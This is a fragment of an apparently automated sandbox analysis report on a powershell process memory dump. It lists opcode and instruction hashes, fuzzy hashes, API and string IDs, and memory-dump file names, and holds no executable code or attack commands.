                                                            • Opcode Fuzzy Hash: 5502842d010c68d0be0a87ba9bd2940b424877ada9b18a2ce83abf0bf6e0d2fd
                                                            • Instruction Fuzzy Hash: E151E5B264C7818FC3009FBC888525EBAD1ABC9324F185B3EE5E5873E1D6788545C35B
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: H:B$pz$pz$uw$xs
                                                            • API String ID: 999431828-1762182995
                                                            • Opcode ID: ffd0a98ec40f3e7c8e4b77ea1664b5a147b98ae172b7dd95e73b24025a02c0b6
                                                            • Instruction ID: a8d23ff692b1174eb06db715e9a28044fd6105134fdaffa46370887a1062778d
                                                            • Opcode Fuzzy Hash: ffd0a98ec40f3e7c8e4b77ea1664b5a147b98ae172b7dd95e73b24025a02c0b6
                                                            • Instruction Fuzzy Hash: 718104B9E01216CFDB14CF64E8916AABB70FF1A304B4991A8D445AF322D738D981CFC5